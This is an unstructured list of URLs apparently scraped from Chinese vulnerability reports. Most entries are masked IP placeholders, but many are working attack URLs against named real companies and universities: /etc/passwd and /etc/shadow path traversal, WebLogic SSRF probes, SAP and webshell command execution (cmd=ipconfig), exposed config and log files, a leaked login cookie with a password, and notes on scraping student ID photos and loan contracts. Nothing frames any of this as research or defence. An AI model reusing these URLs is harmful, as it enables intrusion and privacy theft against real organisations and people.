http://**.**.**.**/corp_pinfo_view.jsp?lang=cn&projectid=1491&jobuserid=142450&jobid=28139&code=eb4954f8cad6c4093efd5cb2c7148d42 http://**.**.**.**/corp_pinfo_view.jsp?lang=cn&projectid=1491&jobuserid=66210&jobid=28139&code=c7654c7501a87e54ba42dd1d1f38f1a6 http://**.**.**.**:8080/tools/SWFUpload/upload.jsp height:20px;BORDER 
http://os.wasu.cn/weixiu/delwxd.php?id=1 http://os.wasu.cn/weixiu/pdxz.php?id=1 http://os.wasu.cn/weixiu/savewxd.php http://os.wasu.cn/weixiu/weixiu.php?id=1 http://os.wasu.cn/weixiu/wxxz.php?id=1 http://newoa.xbwl.cn http://**.**.**.**/null上传的文件名.jsp http://**.**.**.**/tools/SWFUpload/upload.jsp height:20px;BORDER http://**.**.**.**/live800/downlog.jsp?path=/&fileName=/etc/passwd http://brs.cninsure.net/common/easyQueryVer3/EasyQueryVer3Window.jsp?strSql=3 http://61.160.82.219:7002 http://61.160.82.219:7002/uddiexplorer/ma3.jsp http://act.midea.com/jdprize/site/CI4/v2.php http://**.**.**.**/ https://my.1hai.cn/Login https://my.1hai.cn/Login http://**.**.**.**/cgi/newslist.php?dir=101&page=1 http://211.147.244.215/seeyon//logs/login.log http://211.147.244.215/seeyon/ http://**.**.**.**:9080/console/ jdbc:microsoft:sqlserver**.**.**.**:2433"/ jdbc:microsoft:sqlserver**.**.**.**:1433;DatabaseName=SmsClub jdbc:microsoft:sqlserver**.**.**.**:1433;databasename=smdbc http://bidding.sinopec.com http://chat1.gome.com.cn/live800/downlog.jsp?path=/&fileName=/etc/passwd http://www.hwht.com/jobs.html?act=detail&id=24 http://www.invescogreatwall.com:9080/live800/downlog.jsp?path=/&fileName=/C:\Windows\system.ini http://**.**.**.**:80/cms/wcm/login.jsp http://cconline.southernfund.com:8080/live800/downlog.jsp?path=/&fileName=/etc/passwd http://oa.hunantv.com/ http://**.**.**.**/Home/Login http://**.**.**.**/newscolumnistcontent.action?articleId=4294844&authorCode=COL_QWM jar:/usr/lib/jvm/java/lib/tools.jar http://360.m.ayibang.com/enterprise/success/?id=155 http://mtest.ayibang.com/enterprise/success/?id=151 http://**.**.**.**/en/culture/news_content.asp?id=88&listPage=1 http://**.**.**.**/en/culture/news_content.asp?id=88&listPage=1 http://lib.cufe.edu.cn http://**.**.**.**/login.aspx?ReturnUrl=%2f http://**.**.**.**/0529/query.php?iy=1905&p=1 http://www.xuexiba.com/ResetPass/EditPassword?userInfoID=67789 http://**.**.**.**/userlogin.aspx?mid=11&url=/magzartlist.aspx?mcid=3 
http://live.huatu.com/Zbym/index/id/1188*/fx/tj http://**.**.**.**/member/index.jspx http://gsl.sdu.edu.cn/ http://redmine.yicai.com/ http://**.**.**.**/ http://**.**.**.**/news/title/detail.php?Company_SN=1000011476&Site_News_SN=1000014022 http://**.**.**.**/news/title/detail.php?Company_SN=1000011476&Site_News_SN=1000014022 http://academic.law.tsinghua.edu.cn/homepage/index.php?r=search/index&keyword=XPGZ http://academic.law.tsinghua.edu.cn/homepage/index.php?r=search/index&keyword=XPGZ https://**.**.**.** http://**.**.**.**/ https://crm.itrus.com.cn http://**.**.**.**/new_detail.php?tj=8&ty=19&id=114 http://**.**.**.**/new_detail.php?tj=8&ty=19&id=114"-p index.php/gx_tuangou/open_ad?url= index.php/gx_tuangou/open_ad?url=**.**.**.** index.php/gx_tuangou/open_ad?url=**.**.**.** http://**.**.**.**/index.php?op=newsList&action=details&nid=1278&lang=schi http://**.**.**.**/index.php?op=newsList&action=details&nid=1278&lang=schi http://www.lagou.com/gongsi/78386.html http://site682174-8413-203.strikingly.com/ jdbc:oracle:thin:@**.**.**.**:1521:orcl jdbc:oracle:thin:@localhost:1521:orcl jdbc:oracle:thin:@**.**.**.**:1521:orcl http://**.**.**.** http://**.**.**.**:80/ F15F213033B16562C74353BB6B29AC4C:FG=1 http://espel.sem.tsinghua.edu.cn/public/participant_create.php?dr=Yes.&s=11 http://**.**.**.**/ http://**.**.**.**/download.php?id=3322 http://**.**.**.**/index.php?option=com_cckjseblod&task=download&file=configuration.php http://**.**.**.**/5VCommon.asmx?op=UploadFile http://**.**.**.**/5VCommon.asmx?op=uploadImage http://**.**.**.**/Common/UploadFilse/201512111558739RJ6A74/2.asp http://**.**.**.**/ http://**.**.**.**/bbn/visitTesting/download.htm?fileUrl=file:/// http://**.**.**.**/bbn/visitTesting/download.htm?fileUrl=http:// http://www.zsyj.zjut.edu.cn/zs_web/getareaandclass.action http://chat.ofcard.com/live800/downlog.jsp?path=/&fileName=/C:\Windows\system.ini http://oa.glsc.com.cn:8084/names.nsf?Login http://wap.huatu.com/httsxq/bid/55* 
http://wap.huatu.com/htzxxq/vid/1014466* http://wap.huatu.com/htzbxq/id/17308* http://wap.huatu.com/httsxq/bid/55* http://**.**.**.**:80/tmap/map_unicom_list.asp?province=31&type=1&name=1&companytype=11&page=1 http://180.153.223.219/article.php?id=150 http://wooyun.org/bugs/wooyun-2015-0116152 http://wooyun.org/bugs/wooyun-2015-0156894 http://123.127.137.170/seeyon/management/status.jsp http://123.127.137.170/seeyon/logs/login.log http://58.62.185.148:88/seeyon/index.jsp http://wooyun.org/bugs/wooyun-2015-0116152 http://58.62.185.148:88/seeyon/management/status.jsp http://58.62.185.148:88/seeyon/logs/login.log http://211.147.212.212:8089/ http://mail.huatu.com/有验证码, https://211.147.212.215;企业邮箱登录地址:mail.huatu.com; https://is.huatu.com http://182.151.206.253/mysql/ http://www.zteup.com/view/toindex http://std.zteup.com:8080/ http://**.**.**.**/gb/news_view.php?nid=86 http://**.**.**.**/gb/news_view.php?nid=86 http://**.**.**.**/pages/activity/community/index.jsp Cookie:userCookie=uname=xucuipin&pwd=xcp2014 https://**.**.**.**:8080/10000admin/home/index http://219.143.252.189:8088/seeyon/index.jsp http://219.143.252.189:8088/seeyon/management/status.jsp http://219.143.252.189:8088/seeyon/logs/login.log http://cps.huatu.com/index.php http://**.**.**.**/ui/common/cvar/CExec.jsp http://bioinfo.au.tsinghua.edu.cn/dbsuper/details.php?cell=C_001&g=hg19&pm=24119843&se_id=SE_00217 http://xinjiangcme.91huayi.com/report/publicedList.aspx?displayMode=1&EndDate=01/01/1967&frontForUnit=1&holdYear=2015&lowUnitCode=01&principalName=kckpcpey&projectCode=111&projectKind=%C8%AB%B2%BF&ProjectLevel=&projectName=qmsesdux&publicBatch=-1&StartDate=01/01/1967&subject2=01&subject3=0101 http://wireless.xiaozhu.com/app/xzfk/android/220/my/modifyFavorite?_=1448946684365&sessId=f83651f6f45cb6e94578c69a051f8185&dispathChannel=xiaozhu&userId=1823761635&luId=1746300834 http://**.**.**.**/tagInfo/manage/query http://oa.cofco-keystone.com http://oa.cofco-keystone.com/webdoc/file_show.aspx?id=1 
http://oa.cofco-keystone.com/webdoc/HtmlSignatureServer.aspx?DocumentID=1&SignatureID=1&Signature=1&COMMAND=SHOWSIGNATURE http://oa.cofco-keystone.com/Common/GetImageFileFromDB.aspx?empGuid=c3c8d9e2-70cf-4375-8307-c080b18ff5da http://oa.xinladao.net/seeyon/management/ http://jysx.njau.edu.cn/ http://jysx.njau.edu.cn http://wx.minanins.com:9090/ca/ma1.jsp http://**.**.**.**/product.php?product_id=169 http://**.**.**.**/product.php?product_id=169 http://hz.cofcopack.com/login.do http://**.**.**.**/passwd_check.php http://**.**.**.**/passwd_check.php http://**.**.**.**/home/news.php?id=107&class=1 http://event.ztgame.com http://**.**.**.**/dr_detail.php?id=7241 http://**.**.**.**/后,根据链接“**.**.**.**/attachmentDownload.portal?notUseCache=true&type=userPhoto&ownerId=”后面加上学生学号就可以获取该学生的证件照,例如登录后输入链接“**.**.**.**/attachmentDownload.portal?notUseCache=true&type=userPhoto&ownerId=2015282110183”即可获取学号为2015282110183的学生证件照,直接修改该链接后面的学号,就可以获取对应学生的证件照。我写了一个简单的脚本,就爬去了相当数量的证件照。 http://800.vip.com/live800/downloadserver?fid=/&act=2&isAbleZip=0&fna=../../../etc/passwd&a=1 http://oim.oppo.com/oim/downloadserver?fid=/&act=2&isAbleZip=0&fna=../../../../../etc/passwd&a=1 http://www.dongfeng-honda.com/crv_mediaReport.php?nid=440 http://**.**.**.**/Report/DetailResultM.aspx?tableID=76 http://www.dxzq.net/ http://oa.dxzq.net/c6/Jhsoft.Web.login/PassWordSlide.aspx http://oa.dxzq.net/C6/Jhsoft.mobileapp/login/login.html https://**.**.**.**/nimeia/newEdi/blob/ec89e088868753031a34502d4bd7a03548020bd4/channel-base/src/main/java/cn/com/sinosoft/edi/channel/base/communication/http/DaZhongTransmissionServiceImpl.java http://**.**.**.** http://**.**.**.**/news_detail.php?id=14 http://**.**.**.**/news_detail.php?id=14 http://dmoo.cofco.com/dmoo/jsp/main.jsp http://219.143.252.76/cn/web/user_login.aspx http://119.90.48.215:8080/index.html http://119.90.48.201:8080/index.html https://**.**.**.**/ePolicy 
https://**.**.**.**/nimeia/newEdi/blob/ec89e088868753031a34502d4bd7a03548020bd4/channel-base/src/main/java/cn/com/sinosoft/edi/channel/base/communication/http/AnLianHttpTransmissionServiceImpl.java http://**.**.**.**/it-school/php/webcms/public/index.php3?refid=1104&mode=published&lang=en&nocache1402373480 http://**.**.**.**/it-school/php/webcms/public/index.php3?refid=1104&mode=published&lang=en&nocache1402373480 http://**.**.**.**/common.asp?id=1 http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/2015lq/index.asp http://**.**.**.**:83/hzjw/business/xzjglist http://211.151.142.213/gamepay/game_pay_main/index?g_id=314&sidebar_id=2&tid=8001&server_type=106649 http://211.151.142.213/gamepay/game_pay_main/check_game_user?g_id=615&user_name=11111111&server_id=257027&t=0%2E5307019442298461 http://lqsp.dflzm.com.cn:8081/CVWL/system/loginAction!logOut.action http://**.**.**.**/webmessage/view_info.jsp?info_id=35 http://mailserver.snei.com.cn/ http://l.mop.com/ http://gc.imop.com/passport/login.php http://**.**.**.**/article/cowmanwork/article/article.php?item_id=253 http://**.**.**.**/article/cowmanwork/article/article.php?item_id=253 http://ctm.sysu.edu.cn/EN/article/searchArticleResult.do?pager=1 http://**.**.**.**/ActionAllResult.aspx?MagazineId=105 http://**.**.**.**/ActionAllResult.aspx?MagazineId=105 http://dec.jlu.edu.cn http://**.**.**.**/topic_view.php?topicid=246 http://**.**.**.**/topic_view.php?topicid=246 http://**.**.**.**/cs/download.php?sub=driverdetail&PItemID=105 http://**.**.**.**/cs/download.php?sub=driverdetail&PItemID=105 http://ahts.huatu.com http://10.12.16.126:801/eportal/Bootstrap/WebRoot/RucSetting.php http://506srm.cofco.com/ftb.imagegallery.aspx http://506srm.cofco.com/images/whynot.aspx http://**.**.**.**/newsContent.aspx?serial=6760 http://**.**.**.**/newsContent.aspx?serial=6760 http://jse.tju.edu.cn:80/ http://**.**.**.**/vpro.asp?id=97 http://**.**.**.**/vpro.asp?id=97 
http://oa.xinladao.net/seeyon//logs/login.log http://oa.xinladao.net/seeyon/ https://**.**.**.**/ http://27.151.112.180:9000/seeyon//logs/login.log http://27.151.112.180:9000/seeyon/ http://wap.yingyuan.cn/seeyon//logs/login.log http://wap.yingyuan.cn/seeyon/ http://**.**.**.**/neirong_news.asp?id=17 http://mail.cofcorice.com/ http://**.**.**.**/seeyon//logs/ctp.log http://**.**.**.**/seeyon/ https://**.**.**.**主站redis服务未授权访问,可写文件 http://www.rqbao.com/ http://www.rqbao.com/member/login http://111.8.85.13:81/seeyon//logs/login.log http://111.8.85.13:81/seeyon/ inurl:/sfs3/modules/ http://218.93.115.141:8080/seeyon//logs/login.log http://218.93.115.141:8080/seeyon/ http://219.143.162.218/htwx/indexlis.jsp http://219.143.162.218/htwx/common/cvar/CExec.jsp http://**.**.**.**:9090/pms/project/task/projectTaskEditIndex.action?flag=designAudit&id=2349160401 http://**.**.**.**:9200/ http://**.**.**.**/pages/popup/select-user.aspx?t=ctl00_content_piUser_ctl00&v=ctl00_content_piUser_ctl01 http://**.**.**.**/pages/append-design-material/apply.aspx http://**.**.**.**/pages/source-equipment-model/source-equipment-pool-list.aspx http://**.**.**.**:8000/7Expand/TruTalkJumpAddr.aspx http://**.**.**.**:8000/7Expand/ImportPhoneNumber.aspx?CompanyInfo=%D0%C5%D4%C6%D4%C6%C6%BD%CC%A8,**.**.**.**:8800,28103 http://www.emptylegchina.com/ http://op.campus.163.com/adm/selectcate.do?flags=1,2 http://op.campus.163.com/adm/selectcate.do?flags=1,2 http://210.51.48.118 http://210.51.48.118:7001/lht/ http://210.51.48.118:7001/lht/ma3.jsp http://210.51.48.118:7001/lht/out.jsp http://**.**.**.**/bugs/wooyun-2010-0149968。我们来进行一一突破。 chrome://mini_download_frame提供种子文件的解析下载。 http://219.228.130.149/ http://219.228.130.149/Upload/Video_Source/zhangjin_201512011958362957773.Asp http://124.202.134.56/login http://124.202.134.56/uddiexplorer/css.jsp http://124.202.134.56/uddiexplorer/out.jsp http://www.meilishuo.com/share/item/3475786195?ad_tag=1_0_61_0_0-0-0&d_r=6__1-1-2-11 
http://**.**.**.**/main.php?pid=30 https://27.115.34.20/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=cmd.exe%20/c%20ipconfig%20/all http://www.haodai.com/ajax/getpasswd http://wooyun.org/bugs/wooyun-2015-0157467/trace/af09389383ebca9dfd7e73822802417d http://home.sunyard.com/ http://122.224.86.103/common/jsp/file.jsp?key=file&form=formdata&field=attach_name_1&filetitle=attach_title_1& http://zone.wooyun.org/content/14470。 http://yiliao.kingdee.com/inform.php?action=add&companyname=e&intro=1&email=a@b.com&name=1&position=1&tel=1 http://x.x.x.x//MobileApp/login.aspx http://x.x.x.x http://sale.vmall.com/honorbonus.html http://www.vmall.com/sale/coupon/checkImei?callback=jsonp1448983333333&imei=123412341234123 http://euro2012.touzhu.cn/Desc/city*/ http://**.**.**.**:7788/szinfo/net360!execute.action?orgId=48821 code:6390被直接返回了 http://219.141.242.62/iucp http://act.vg.ztgame.com/video/public/show/13 http://service.zhaopin.com/live800/downlog.jsp?path=/&fileName=/etc/hosts http://www.cbsi.com.cn/index.php?m=poster&c=index&a=poster_click&id=1 http://**.**.**.**/news_list_wd/&newsCategoryId=7.html http://www.bankofshanghai.com/uddiexplorer/SearchPublicRegistries.jsp http://www.szse.cn/uddiexplorer/SetupUDDIExplorer.jsp http://www.szse.cn/uddiexplorer/SearchPublicRegistries.jsp?operator=http://10.132.82.17:22&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Businesslocation&btnSubmit=Search http://**.**.**.**/cnbtjc/hbcx/hbcx.shtml http://**.**.**.** http://**.**.**.** http://**.**.**.** http://www.**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** 
http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://app.**.**.**.** http://m.**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://www.lvxingshe.me http://**.**.**.** http://www.**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://www.edaojia.so http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://www.beiwo.ac http://beiwo.ac http://**.**.**.** http://**.**.**.** http://www.daimao.tv http://**.**.**.** http://**.**.**.** http://**.**.**.** http://www.**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** 
http://**.**.**.** http://**.**.**.** http://**.**.**.**.cn http://**.**.**.** http://**.**.**.** http://**.**.**.** http://ask.**.**.**.** http://**.**.**.** http://**.**.**.** http://test.**.**.**.** http://www.**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://www.**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** https://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://www.**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://qq.**.**.**.** http://**.**.**.** http://jackon.me http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://www.uning.tv http://**.**.**.** http://api.uning.tv http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.**1 http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://m.**.**.**.** 
http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** http://**.**.**.** https://ly.wanda.cn/ http://60.28.104.133:9060/yyoa/ http://www.cs.ecitic.com/uddiexplorer/SearchPublicRegistries http://www.nffund.com/uddiexplorer/SearchPublicRegistries.jsp?operator=http://127.0.0.1:22&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Businesslocation&btnSubmit=Search http://www.dfzq.com.cn/uddiexplorer/SearchPublicRegistries.jsp http://**.**.**.**/pc/index.aspx http://**.**.**.**/pc/productlist.aspx?productid=2 http://fnonline.feiniu.com/live800/downlog.jsp?filepath=/&file=etc/passwd http://**.**.**.**/ec/oldpolicy/oldpolicy_into.action http://219.143.162.218/htwx/ http://219.143.162.218/htwx/common/easyQueryVer3/EasyQueryXML.jsp http://219.143.162.218/htwx/ http://chat.beibei.com/live/downloadserver?fid=/&act=2&isAbleZip=0&fna=../../../etc/shadow&a=1 http://www.xsdzq.cn/ http://oa.xsdzq.cn/C6/Jhsoft.Web.login/PassWordSlide.aspx http://oa.xsdzq.cn/C6/Jhsoft.mobileapp/login/login.html www.chinaamc.com/uddiexplorer/SearchPublicRegistries.jsp?operator=http://192.168.1.139:80&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Businesslocation&btnSubmit=Search http://www.zte-v.com.cn/manage/Default.aspx http://210.51.195.4/admin/index.asp http://210.51.195.4/admin/index.asp 
http://210.51.195.4/Templates/cn/html/1.asp;.html http://42.62.67.117/.git/config http://42.62.67.117/wp-admin/ http://wp.licaifan.com/wp-admin/ http://**.**.**.**/index.aspx http://**.**.**.**/pPackageTraceQuery.aspx https://github.com/nimeia/newEdi/blob/ec89e088868753031a34502d4bd7a03548020bd4/channel-base/src/main/java/cn/com/sinosoft/edi/channel/base/communication/http/MinAnHttpTransmissionServiceImpl.java inurl:ioffice查了一下用红帆iOffice办公平台的还有 http://**.**.**.**/ioffice/prg/set/wss/ioCtlSet.asmx http://**.**.**.**/general/picture/batch_down.php?TmpFileNameStr=DSCN0292.jpg|@~@&SUB_DIR=&PIC_PATH=d:/myoa/%D4%B1%B9%A4%BB%EE%B6%AF http://**.**.**.**/general/picture/batch_down.php?TmpFileNameStr=index.php|@~@&SUB_DIR=&PIC_PATH=d:/myoa/webroot http://**.**.**.**/general/picture/batch_down.php?TmpFileNameStr=cmd.exe|@~@&SUB_DIR=&PIC_PATH=c:/windows/system32 http://**.**.**.**/C6/Jhsoft.Web.login/newview.aspx?id=1 http://**.**.**.**/C6/Jhsoft.Web.login/newview.aspx?id=1 http://**.**.**.**/C6/Jhsoft.Web.login/newview.aspx?id=1 http://sq.baomihua.com/special/sq/SqRegistrar/sqlogin.aspx这里,登录位置没有验证码限制 http://mooc1.chaoxing.com/moocAnalysis/statistics-tch?courseId=账户CourseID&classId=账户CLASSID&ut=t http://mooc1.chaoxing.com/moocAnalysis/statistics-tch?courseId=81805653&classId=407832&ut=t http://www.jointwisdom.cn/index.php?c=content&a=list&catid=34 http://www.jointwisdom.cn/jinxing/hotelInfo.php?hotel_id=166 http://**.**.**.**/bugs/wooyun-2010-093049 http://**.**.**.**/ebook.php?id=3 http://info.tcl.com http://m.peugeot.com.cn:80/campaign/user/user.php?action=register http://www.gpslh.com/loginlh.jsp http://app.caijing.com.cn/?app=member&controller=index&action=login这个地方没有验证码没有登录限制 www.gw.com.cn http://live.huatu.com/Msym/index/id/49*/p/2.html http://gsts.huatu.com http://idke.ruc.edu.cn http://42.62.2.82/WEB-INF/web.xml http://42.62.2.82/WEB-INF/proxool_sql.xml http://oa.autoradio.cn/ http://new.conqueror.cn/productsDia.php?classId=12&id=643&sClassId=14 
http://**.**.**.**/c6/Jhsoft.Web.login/newview.aspx?id=1 http://**.**.**.**/web/newsshow.asp?CatalogID=139&id=699 http://**.**.**.**/shopsmart/index.php/Article/index/first_cate_id/10100*/module/0/art_id/639.html http://www.renrenle.cn/scm/jump.do?prefix=&page=/logoff.do?method=logoff http://www.renrenle.cn/scm/quote/newSupplyAction.do?method=view&supplyID=136732 http://222.33.134.193:8080/yyoa/ http://222.33.134.193:8080/yyoa/common/js/menu/test.jsp?doType=101&S1=select%20@@basedir http://b.wlanplus.com/cpa/escoreAndroidCallBack?uuid=2d6191c4dd0c1d134b5a16f65b151e84&userID=36026170-6381561&score=20&exchangetime=2015-11-27+17%3A20%3A30&plat=0&appName=%E7%95%85%E6%97%A0%E7%BA%BF&idfa=&adId=14388&adName=%E4%B9%90%E8%9C%82%E7%BD%91&packageName=com.yek.lafaso&order_id=2d6191c4dd0c1d134b5a16f65b151e8414388&signNum=1&appChildId=&appChildName=&sign=43628332fa8d07f3326c9bea8551a1e1 http://**.**.**.**:9080/cypx_hn/ https://licai.lianjia.com/loanContract?bidId=11051,暴露服务器信息了 https://licai.lianjia.com/guaranteeContract?bidId=10001&nowTime=2ffujjrk,修改bidId为10000以上的数字,即可看到对应借款及担保协议信息 http://**.**.**.**/ http://www.renrenle.cn/scm/jump.do?prefix=&page=/logoff.do?method=logoff http://www.renrenle.cn/scm/quote/newSupplyAction.do?method=view&supplyID=136732 http://news.lenovomm.com/solr/#/ 
javax.servlet-api-3.1.0.jar/data/solr-5.2.1/server/lib/jetty-continuation-9.2.10.v20150310.jar/data/solr-5.2.1/server/lib/jetty-deploy-9.2.10.v20150310.jar/data/solr-5.2.1/server/lib/jetty-http-9.2.10.v20150310.jar/data/solr-5.2.1/server/lib/jetty-io-9.2.10.v20150310.jar/data/solr-5.2.1/server/lib/jetty-jmx-9.2.10.v20150310.jar/data/solr-5.2.1/server/lib/jetty-rewrite-9.2.10.v20150310.jar/data/solr-5.2.1/server/lib/jetty-security-9.2.10.v20150310.jar/data/solr-5.2.1/server/lib/jetty-server-9.2.10.v20150310.jar/data/solr-5.2.1/server/lib/jetty-servlet-9.2.10.v20150310.jar/data/solr-5.2.1/server/lib/jetty-servlets-9.2.10.v20150310.jar/data/solr-5.2.1/server/lib/jetty-util-9.2.10.v20150310.jar/data/solr-5.2.1/server/lib/jetty-webapp-9.2.10.v20150310.jar/data/solr-5.2.1/server/lib/jetty-xml-9.2.10.v20150310.jar/data/solr-5.2.1/server/lib/ext/jcl-over-slf4j-1.7.7.jar/data/solr-5.2.1/server/lib/ext/jul-to-slf4j-1.7.7.jar/data/solr-5.2.1/server/lib/ext/log4j-1.2.17.jar/data/solr-5.2.1/server/lib/ext/slf4j-api-1.7.7.jar/data/solr-5.2.1/server/lib/ext/slf4j-log4j12-1.7.7.jar/data/solr-5.2.1/server/resources http://ksec.koolearn.com/kyds2015/aps http://**.**.**.**/admin/utility/showImageId.php?id=103041 http://**.**.**.**/gceService.php?type=2%27 http://**.**.**.**/tmpbiuve.php?cmd=ipconfig http://t.10jqka.com.cn/ http://t.10jqka.com.cn/manage0033t/index/ http://www.cre.cn/jsp/fgsjj/detail_4_dd.jsp?id=914 http://www.njzxw.cn/Plugins/swfFileUpload/UploadHandler.ashx http://club.zoomla.cn/,但账户密码应该没有换把?查看bbs的账户有3W多条: http://**.**.**.** http://em.hit.edu.cn/yjsjj.asp?sp=-1 http://**.**.**.**/bugs/wooyun-2010-0120530续(注意,页面不同) http://**.**.**.**/indexlis.jsp时 http://**.**.**.**/common/easyQueryVer3/EasyQueryVer3.js status:no;help:0;close:0;dialogWidth:0px;dialogHeight:0px;resizable=1 http://**.**.**.**/bugs/wooyun-2015-0138683 http://wooyun.org/bugs/wooyun-2015-0147511为什么要忽略呢! 
online.kingdee.com/live800/downlog.jsp?path=/&fileName=/etc/passwd http://**.**.**.**/xwcj/manage.php?m=Scan&a=article_list http://bb.ztgame.com/backend/index/login http://**.**.**.** http://**.**.**.** http://tepos.jxlife.com.cn/ter/ http://tepos.jxlife.com.cn/ter/common/cvar/CExec.jsp http://210.52.218.144/phpmyadmin/index.php http://univ.zte.com.cn/DeanMainBox/WriteMailToDean.aspx?isportal=ok&userid=&username=&CurCulture=1 http://120.26.113.45/ http://www.gome.com.cn/uddiexplorer/SearchPublicRegistries.jsp http://www.gome.com.cn/uddiexplorer/SetupUDDIExplorer.jsp http://www.gome.com.cn/uddiexplorer/SearchPublicRegistries.jsp?operator=http://127.0.0.1:8080&rdoSearch=name&txtSearchname=test&txtSearchkey=&txtSearchfor=&selfor=Businesslocation&btnSubmit=Search http://www.gome.com.cn/uddiexplorer/SearchPublicRegistries.jsp?operator=http://172.16.0.1:22&rdoSearch=name&txtSearchname=test&txtSearchkey=&txtSearchfor=&selfor=Businesslocation&btnSubmit=Search http://dmoa.cofco.com/seeyon/index.jsp http://dmoa.cofco.com/seeyon/management/index.jsp www.kuaidi100.com http://www.kuaidi100.com http://**.**.**.** http://jonline.nwu.edu.cn/Admin/index.php/Public/announce_content/id/15* http://**.**.**.**/login/Default.aspx http://**.**.**.**/atd/main.asp?LOGON_USER=liuqiang http://it.nwpu.edu.cn/Web_Index http://**.**.**.**/index.action http://**.**.**.**/liucheng.asp http://**.**.**.**/ http://**.**.**.** http://photos.xywy.com http://hr.chinagasholdings.com/ http://scm.chinagasholdings.com http://oa.baiyyy.com/login.jsp http://**.**.**.**/modules/jobs/index2.php?pa=viewResume&rid=00000000883 http://**.**.**.**/modules/jobs/index2.php?pa=viewResume&rid=00000000883 http://afis.hit.edu.cn http://**.**.**.**/khoa/index.jsp http://**.**.**.** http://**.**.**.**/admin/database_menager.asp http://**.**.**.**/aviso/list/available_book.php?class=LA http://**.**.**.**/aviso/list/available_book.php?class=LA 
